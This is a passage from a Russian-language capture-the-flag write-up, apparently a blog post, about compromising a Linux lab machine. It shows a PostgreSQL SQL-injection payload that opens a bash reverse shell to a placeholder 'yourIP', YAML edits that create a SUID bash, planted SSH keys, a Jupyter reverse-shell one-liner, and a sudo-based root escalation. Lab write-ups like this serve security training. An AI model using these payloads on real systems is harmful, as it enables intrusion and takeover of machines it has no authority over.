\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438 \u0442\u043e, \u0447\u0442\u043e \u043e\u043d \u043e\u0431\u043b\u0430\u0434\u0430\u0435\u0442 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u0441\u0443\u043f\u0435\u0440\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u043f\u043e\u043b\u0443\u0447\u0435\u043d \u0441\u043f\u0438\u0441\u043e\u043a \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u044b: <code>root, juno, jovian, postgres<\/code>.<\/p>\n\n\n\n<p>\u0412\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0432\u0448\u0438\u0441\u044c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0435\u0439 \u043e \u0421\u0423\u0411\u0414 PostgreSQL \u0438 \u0442\u0435\u043c, \u0447\u0442\u043e \u0442\u0435\u043a\u0443\u0449\u0438\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0441\u0443\u043f\u0435\u0440\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u043c &#8211; \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u0441\u043e\u0437\u0434\u0430\u0442\u044c \u0442\u0430\u0431\u043b\u0438\u0446\u0443, \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0441\u043c\u043e\u0436\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435, \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u043c \u0432 \u0442\u0435\u043b\u0435 \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u043a <code>\/api\/ds\/query<\/code> \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 SQL \u0437\u0430\u043f\u0440\u043e\u0441:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\nCREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM &#039;bash -c \\&quot;bash -i &amp;gt;&amp;amp; \/dev\/tcp\/yourIP\/7331 0&amp;gt;&amp;amp;1\\&quot;&#039;\n<\/pre><\/div>\n\n\n<p>\u041f\u0435\u0440\u0435\u0434 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u043e\u0439 \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e <code>nc -nvlp 7331<\/code> \u043e\u0442\u043a\u0440\u043e\u0435\u043c \u043f\u043e\u0440\u0442 \u0434\u043b\u044f \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u0448\u0435\u043b\u043b \u043e\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f <code>postgres<\/code>:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-23.png\" alt=\"\" class=\"wp-image-818\" width=\"700\" \/><\/figure>\n<\/div>\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e juno<\/h3>\n\n\n\n<p>\u0417\u0430\u0433\u0440\u0443\u0437\u0438\u043c \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u0443\u044e \u043c\u0430\u0448\u0438\u043d\u0443 \u0441\u043a\u0440\u0438\u043f\u0442 \u0441\u0431\u043e\u0440\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 <code>LinPEAS<\/code> \u0438 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 <code>pspy64<\/code>.<\/p>\n\n\n\n<p>\u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e <code>LinPEAS<\/code> \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043c, \u0447\u0442\u043e \u043e\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f <code>jovian<\/code> \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u0430 \u0443\u0442\u0438\u043b\u0438\u0442\u0430 <code>jupiter-notebook<\/code>:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\njovian      1159  0.0  1.6  81344 66492 ?        S    Jun15   0:00 \/usr\/bin\/python3 \/usr\/local\/bin\/jupyter-notebook --no-browser \/opt\/solar-flares\/flares.ipynb\n<\/pre><\/div>\n\n\n<p>\u0421\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u0432\u044b\u0432\u043e\u0434 \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u043f\u043e\u0441\u043b\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 pspy64:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\n2023\/06\/15 12:48:01 CMD: UID=1000 PID=1842   | \/bin\/sh -c \/home\/juno\/shadow-simulation.sh \n2023\/06\/15 12:48:01 CMD: UID=1000 PID=1843   | \/bin\/bash \/home\/juno\/shadow-simulation.sh \n2023\/06\/15 12:48:01 CMD: UID=1000 PID=1845   | \/home\/juno\/.local\/bin\/shadow \/dev\/shm\/network-simulation.yml                                                                               \n2023\/06\/15 12:48:01 CMD: UID=1000 PID=1848   | \n2023\/06\/15 12:48:01 CMD: UID=1000 PID=1849   | lscpu --online --parse=CPU,CORE,SOCKET,NODE \n2023\/06\/15 12:48:01 CMD: UID=1000 PID=1854   | \/home\/juno\/.local\/bin\/shadow \/dev\/shm\/network-simulation.yml                                                                               \n2023\/06\/15 12:48:01 CMD: UID=1000 PID=1855   | \/usr\/bin\/curl -s server \n2023\/06\/15 12:48:01 CMD: UID=1000 PID=1857   | \/usr\/bin\/curl -s server \n2023\/06\/15 12:48:01 CMD: UID=1000 PID=1859   | \/home\/juno\/.local\/bin\/shadow \/dev\/shm\/network-simulation.yml                                                                               \n2023\/06\/15 12:48:01 CMD: UID=1000 PID=1864   | cp -a \/home\/juno\/shadow\/examples\/http-server\/network-simulation.yml \/dev\/shm\/\n<\/pre><\/div>\n\n\n<p>\u041a\u0430\u043a \u043c\u043e\u0436\u0435\u043c \u0437\u0430\u043c\u0435\u0442\u0438\u0442\u044c &#8211; \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c <code>juno<\/code> \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 <code>shadow<\/code> \u0441 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u043c \u0432 \u0432\u0438\u0434\u0435 \u0444\u0430\u0439\u043b\u0430 <code>\/dev\/shm\/network-simulation.yml<\/code>. \u0418\u0441\u0441\u043b\u0435\u0434\u0443\u0435\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u043c\u043e\u0435 \u0444\u0430\u0439\u043b\u0430 \u0438 \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u043a\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u043c\u043e\u0436\u043d\u043e \u0435\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\ngeneral:\n  # stop after 10 simulated seconds\n  stop_time: 10s\n  # old versions of cURL use a busy loop, so to avoid spinning in this busy\n  # loop indefinitely, we add a system call latency to advance the simulated\n  # time when running non-blocking system calls\n  model_unblocked_syscall_latency: true\n\nnetwork:\n  graph:\n    # use a built-in network graph containing\n    # a single vertex with a bandwidth of 1 Gbit\n    type: 1_gbit_switch\n\nhosts:\n  # a host with the hostname &#039;server&#039;\n  server:\n    network_node_id: 0\n    processes:\n    - path: \/usr\/bin\/python3\n      args: -m http.server 80\n      start_time: 3s\n  # three hosts with hostnames &#039;client1&#039;, &#039;client2&#039;, and &#039;client3&#039;\n  client:\n    network_node_id: 0\n    quantity: 3\n    processes:\n    - path: \/usr\/bin\/curl\n      args: -s server\n      start_time: 5s\n<\/pre><\/div>\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\"><\/blockquote>\n\n\n\n<p>\u0422\u0435\u043a\u0443\u0449\u0438\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c postgres \u043e\u0431\u043b\u0430\u0434\u0430\u0435\u0442 \u043f\u0440\u0430\u0432\u0430\u043c\u0438 \u043d\u0430 \u0437\u0430\u043f\u0438\u0441\u044c \u0432 \u044d\u0442\u043e\u0442 \u0444\u0430\u0439\u043b \u0438 \u043c\u044b \u043c\u043e\u0435\u043c \u043c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0435\u0433\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u0447\u0442\u043e\u0431\u044b \u0441\u043d\u0430\u0447\u0430\u043b\u0430 c \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0435\u0433\u043e \u043f\u043e\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0431\u0438\u043d\u0430\u0440\u043d\u044b\u0439 \u0444\u0430\u0439\u043b <code>\/bin\/bash<\/code>, \u0430 \u0437\u0430\u0442\u0435\u043c \u043f\u0440\u0438\u0441\u0432\u043e\u0438\u0442\u044c \u0435\u043c\u0443 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 SUID:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\ngeneral:\n  # stop after 10 simulated seconds\n  stop_time: 10s\n  # old versions of cURL use a busy loop, so to avoid spinning in this busy\n  # loop indefinitely, we add a system call latency to advance the simulated\n  # time when running non-blocking system calls\n  model_unblocked_syscall_latency: true\n\nnetwork:\n  graph:\n    # use a built-in network graph containing\n    # a single vertex with a bandwidth of 1 Gbit\n    type: 1_gbit_switch\n\nhosts:\n  # a host with the hostname &#039;server&#039;\n  server:\n    network_node_id: 0\n    processes:\n    - path: \/usr\/bin\/python3\n      args: -m http.server 80\n      start_time: 3s\n  # three hosts with hostnames &#039;client1&#039;, &#039;client2&#039;, and &#039;client3&#039;\n  client:\n    network_node_id: 0\n    quantity: 3\n    processes:\n    - path: \/usr\/bin\/cp\n      args: \/bin\/bash \/tmp\/user\n      start_time: 5s\n<\/pre><\/div>\n\n\n<p>\u041f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u0432 \u043f\u0430\u043f\u043a\u0443 \u0431\u0443\u0434\u0435\u0442 \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d \u0431\u0438\u043d\u0430\u0440\u043d\u044b\u0439 \u0444\u0430\u0439\u043b &#8211; \u0430\u043d\u0430\u043b\u043e\u0433\u0438\u0447\u043d\u044b\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u0443\u0435\u043c SUID \u0431\u0438\u0442:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\ngeneral:\n  # stop after 10 simulated seconds\n  stop_time: 10s\n  # old versions of cURL use a busy loop, so to avoid spinning in this busy\n  # loop indefinitely, we add a system call latency to advance the simulated\n  # time when running non-blocking system calls\n  model_unblocked_syscall_latency: true\n\nnetwork:\n  graph:\n    # use a built-in network graph containing\n    # a single vertex with a bandwidth of 1 Gbit\n    type: 1_gbit_switch\n\nhosts:\n  # a host with the hostname &#039;server&#039;\n  server:\n    network_node_id: 0\n    processes:\n    - path: \/usr\/bin\/cp\n      args: \/bin\/bash \/tmp\/user\n      start_time: 3s\n  # three hosts with hostnames &#039;client1&#039;, &#039;client2&#039;, and &#039;client3&#039;\n  client:\n    network_node_id: 0\n    quantity: 3\n    processes:\n    - path: \/usr\/bin\/chmod\n      args: u+s \/tmp\/user\n      start_time: 5s\n<\/pre><\/div>\n\n\n<p>\u041f\u0435\u0440\u0435\u0439\u0434\u0451\u043c \u0432 \u044d\u0442\u043e\u0442 \u0448\u0435\u043b\u043b \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e <code>.\/tmp\/user -p<\/code>, \u0437\u0430\u0442\u0435\u043c \u0434\u043b\u044f \u0441\u0442\u0430\u0431\u0438\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u0438\u044f \u043f\u043e ssh \u0441\u043a\u043e\u043f\u0438\u0440\u0443\u0435\u043c \u0441\u0432\u043e\u0439 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0439 \u043a\u043b\u044e\u0447 \u0432 \u043f\u0430\u043f\u043a\u0443 <code>\/home\/juno\/.ssh\/authorized_keys<\/code>, \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0447\u0435\u0433\u043e \u043c\u044b \u0441\u043c\u043e\u0436\u0435\u043c \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0442\u044c\u0441\u044f \u0441\u043e \u0441\u0432\u043e\u0438\u043c \u043b\u0438\u0447\u043d\u044b\u043c \u043f\u0440\u0438\u0432\u0430\u0442\u043d\u044b\u043c \u043a\u043b\u044e\u0447\u043e\u043c \u043a \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-24.png\" alt=\"\" class=\"wp-image-821\" width=\"700\" \/><\/figure>\n<\/div>\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u0413\u043e\u0440\u0438\u0437\u043e\u043d\u0442\u0430\u043b\u044c\u043d\u043e\u0435 \u0434\u0432\u0438\u0436\u0435\u043d\u0438\u0435, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f jovian<\/h3>\n\n\n\n<p>\u0420\u0430\u043d\u0435\u0435, \u0432 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0435 \u0441\u0431\u043e\u0440\u0430 \u0441\u0432\u0435\u0434\u0435\u043d\u0438\u0439 \u043e \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435, \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438, \u0447\u0442\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c jovian \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u043b \u0441\u0435\u0440\u0432\u0438\u0441 <code>jupyter-notebook<\/code>. \u041f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u044d\u0442\u043e\u0442 \u0441\u0435\u0440\u0432\u0438\u0441 \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442 \u043d\u0430 \u043f\u043e\u0440\u0442\u0435 8888, \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u043c \u043a\u0430\u043a\u0438\u0435 \u043f\u043e\u0440\u0442\u044b \u043e\u0442\u043a\u0440\u044b\u0442\u044b \u043d\u0430 \u0446\u0435\u043b\u0435\u0432\u043e\u0439 \u043c\u0430\u0448\u0438\u043d\u0435 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e <code>netstat -tlpn<\/code>:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\nActive Internet connections (only servers)\nProto Recv-Q Send-Q Local Address           Foreign Address         State       PID\/Program name\ntcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN      -\ntcp        0      0 127.0.0.1:8888          0.0.0.0:*               LISTEN      -\ntcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -\ntcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -\ntcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      -\ntcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -\ntcp6       0      0 :::22                   :::*                    LISTEN      -\n<\/pre><\/div>\n\n\n<p>\u0414\u043b\u044f \u0443\u0434\u043e\u0431\u0441\u0442\u0432\u0430 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 jupyter \u043f\u0440\u043e\u043a\u0441\u0438\u0440\u0443\u0435\u043c \u043f\u043e\u0440\u0442 8888 \u043d\u0430 \u0441\u0432\u043e\u044e \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u0443\u044e \u043c\u0430\u0448\u0438\u043d\u0443: <code>ssh juno@10.10.11.216 -i key -L 8888:127.0.0.1:8888<\/code><\/p>\n\n\n\n<p>\u0412\u0435\u0440\u043d\u0443\u0432\u0448\u0438\u0441\u044c \u0441\u043d\u043e\u0432\u0430 \u043a \u0440\u0430\u043d\u0435\u0435 \u0441\u043e\u0431\u0440\u0430\u043d\u043d\u044b\u043c \u0434\u0430\u043d\u043d\u044b\u043c \u043f\u043e\u0434\u043c\u0435\u0442\u0438\u043c \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044e, \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0445\u0440\u0430\u043d\u0438\u0442\u0441\u044f \u0444\u0430\u0439\u043b <code>jupyter-notebook<\/code>, \u0430 \u0438\u043c\u0435\u043d\u043d\u043e <code>\/opt\/solar-flares\/<\/code>. \u0418\u0441\u0441\u043b\u0435\u0434\u0443\u044f \u0441\u043e\u0441\u0435\u0434\u043d\u0438\u0435 \u043f\u0430\u043f\u043a\u0438 &#8211; \u043d\u0430\u0439\u0434\u0451\u043c \u043f\u0430\u043f\u043a\u0443 <code>logs<\/code>. \u0412 \u043d\u0435\u0439 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442\u0441\u044f \u043b\u043e\u0433\u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0441\u0435\u0440\u0432\u0438\u0441\u0430, \u043e\u0442\u043a\u0443\u0434\u0430 \u043c\u044b \u0443\u0437\u043d\u0430\u0435\u043c \u0432\u0435\u0440\u0441\u0438\u044e Jupyter \u0438 \u0442\u043e\u043a\u0435\u043d:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-25.png\" alt=\"\" class=\"wp-image-824\" width=\"850\" \/><\/figure>\n<\/div>\n\n\n<p><\/p>\n\n\n\n<p>\u0412\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u0441\u044f \u044d\u0442\u0438\u043c \u0442\u043e\u043a\u0435\u043d\u043e\u043c \u0434\u043b\u044f \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u0438 \u0432 jupyter:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-26.png\" alt=\"\" class=\"wp-image-825\" width=\"600\" \/><\/figure>\n<\/div>\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-27.png\" alt=\"\" class=\"wp-image-826\" width=\"850\" \/><\/figure>\n<\/div>\n\n\n<p><\/p>\n\n\n\n<p>\u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e Jupyter \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u043d\u0430 \u044f\u0437\u044b\u043a\u0435 Python. \u0421\u043e\u0437\u0434\u0430\u0434\u0438\u043c \u043d\u043e\u0432\u043e\u0435 \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u043e \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u043c \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u043a\u043e\u0434:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>import os; os.system(&#8216;bash -c &#8220;bash -i &gt;&amp; \/dev\/tcp\/yourIP\/7771 0&gt;&amp;1&#8243;&#8216;);<\/p>\n<\/blockquote>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-28.png\" alt=\"\" class=\"wp-image-827\" width=\"700\" \/><\/figure>\n<\/div>\n\n\n<p><\/p>\n\n\n\n<p>\u041f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0439 \u0443\u0447\u0451\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 <code>jovian<\/code>. \u0414\u043b\u044f \u0443\u0434\u043e\u0431\u0441\u0442\u0432\u0430 \u0438 \u043d\u0430 \u0441\u043b\u0443\u0447\u0430\u0439 \u0435\u0441\u043b\u0438 \u0432\u043e\u0437\u043d\u0438\u043a\u043d\u0443\u0442 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u044b \u0441 \u0441\u0435\u0442\u044c\u044e &#8211; \u0441\u043a\u043e\u043f\u0438\u0440\u0443\u0435\u043c \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0439 \u043a\u043b\u044e\u0447 \u0432 \u043f\u0430\u043f\u043a\u0443 <code>\/home\/jovian\/.ssh\/authorized_keys<\/code>, \u0447\u0442\u043e\u0431\u044b \u0432 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u043c \u043f\u043e \u043d\u0435\u043c\u0443 \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0430\u0442\u044c\u0441\u044f \u043f\u043e ssh.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a root<\/h3>\n\n\n\n<p>\u0418\u0449\u0435\u043c \u0438\u0441\u043f\u043e\u043b\u043d\u0438\u043c\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0441 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c\u044e \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f root:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: plain; title: ; notranslate\" title=\"\">\nsudo -l\n<\/pre><\/div>\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full is-resized\"><img decoding=\"async\" src=\"https:\/\/seq.team\/wp-content\/uploads\/2023\/10\/image-29.png\" alt=\"\" class=\"wp-image-828\" width=\"800\" \/><\/figure>\n<\/div>\n\n\n<p><\/p>\n\n\n\n<p>\u0412 \u0442\u0430\u043a\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u043c\u044b \u043c\u043e\u0436\u0435\u043c \u0441\u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u0442\u044c<code> \/bin\/bash<\/code> \u0432 <code>\/usr\/local\/bin\/sattrack<\/code>:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>cp \/bin\/bash \/usr\/local\/bin\/sattrack<\/p>\n<\/blockquote>\n\n\n\n<p>\u041f\u043e\u0441\u043b\u0435 \u0447\u0435\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u043c \u0441\u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0431\u0438\u043d\u0430\u0440\u043d\u044b\u0439 \u0444\u0430\u0439\u043b: <code>sudo \/usr\/local\/bin\/sattrack<\/code><\/p>\n\n\n\n<p>\u041f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e root \u0438 \u0435\u0433\u043e \u0444\u043b\u0430\u0433\u0443.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u0421\u0441\u044b\u043b\u043a\u0438:<\/h3>\n\n\n\n<p><a href=\"https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/blob\/master\/SQL%20Injection\/PostgreSQL%20Injection.md\">https:\/\/github.com\/swisskyrepo\/PayloadsAllTheThings\/blob\/master\/SQL%20Injection\/PostgreSQL%20Injection.md<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/medium.com\/r3d-buck3t\/command-execution-with-postgresql-copy-command-a79aef9c2767\">https:\/\/medium.com\/r3d-buck3t\/command-execution-with-postgresql-copy-command-a79aef9c2767<\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/arf20\/arftracksat\">https:\/\/github.com\/arf20\/arftracksat<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u0421\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u044c: Medium \u041e\u0421: Linux \u0411\u0430\u043b\u043b\u044b: 30 IP: 10.10.11.216 \u0422\u0435\u0433\u0438: SQLi, PostrgeSQL, LPE, Jupyter RCE, Linux Privileges \u041a\u0440\u0430\u0442\u043a\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u041f\u043e\u0441\u043b\u0435 \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0439 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0438 \u0432\u0435\u0431-\u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u0435\u043c \u0434\u043e\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u043f\u043e\u0434\u0434\u043e\u043c\u0435\u043d \u0441 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c\u044e \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u0438\u044f SQLi. \u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0441\u0438\u043d\u0442\u0430\u043a\u0441\u0438\u0441\u0430 PostgreSQL \u0438 \u0432\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u0435 \u043f\u0440\u0430\u0432 \u0441\u0443\u043f\u0435\u0440\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043f\u0440\u0438 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0438 \u0441 \u0421\u0423\u0411\u0414 \u043f\u043e\u043b\u0443\u0447\u0438\u043c \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043e\u0442 \u043b\u0438\u0446\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f postrges. \u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e 